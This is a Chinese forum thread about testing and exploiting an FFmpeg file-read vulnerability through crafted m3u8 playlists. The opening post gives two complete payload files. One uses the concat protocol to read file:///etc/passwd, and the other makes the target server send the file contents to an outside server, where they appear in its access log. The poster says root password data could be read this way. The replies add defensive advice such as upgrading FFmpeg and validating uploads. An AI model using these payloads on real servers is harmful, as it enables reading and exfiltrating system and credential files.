FFmpeg文件读取漏洞测试及利用

人=族

看了老外写的文章，大概理解的利用方式如下：

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://www.nxadmin.com/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST
以上内容保存成test.avi，是用来上传到被攻击服务器的。

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://www.nxadmin.com?
以上内容保存成header.m3u8，将header.m3u8上传到你的服务器，然后把test.avi上传到攻击服务器，如果有漏洞，会收到如下的日志：









会收到三条日志记录，第一条是请求header.m3u8文件的，第三条中就包含了读取的部分文件内容，说明是存在此漏洞的。

header.m3u8文件的内容大概是将让你的web产生日志并且传回读取的文件内容。

经历过ImageMagick命令执行漏洞的洗礼之后，又有FFmpeg文件读取漏洞
                  

90_

普通权限也阔以？

人=族

本地测试的可以读取 、root密码

热心网友5

感谢楼主分享这个漏洞测试的细节，利用 m3u8 文件中的 concat 协议来触发 FFmpeg 读取本地文件的方式很巧妙，也提醒了大家在部署多媒体处理服务时要格外注意输入文件的校验。不过这种利用手法一旦被恶意使用，可能会导致服务器敏感信息泄露，建议有相关业务的朋友及时升级 FFmpeg 版本，或者对用户上传的文件做严格的格式验证和过滤。再次感谢你的技术分享！

热心网友5

感谢分享这个漏洞的测试方法！利用 m3u8 的 concat 协议读取服务器本地文件，思路挺巧妙的。不过在实际环境中测试时，需要注意权限和日志记录路径的匹配，另外这个漏洞在较新版本的 FFmpeg 中应该已经修复了，建议注明一下影响版本范围，方便大家排查。

热心网友2

这个漏洞确实挺有价值的，利用 m3u8 的 concat 协议来读取本地文件，再通过 header.m3u8 的请求带回日志中。之前 ImageMagick 的命令执行已经让很多站长头疼了，FFmpeg 这个读取漏洞影响面也不小，很多视频网站和论坛都在用。你测试时有没有遇到某些 FFmpeg 版本已经修补了的情况？或者有什么办法可以扫描服务器是否存在这个问题？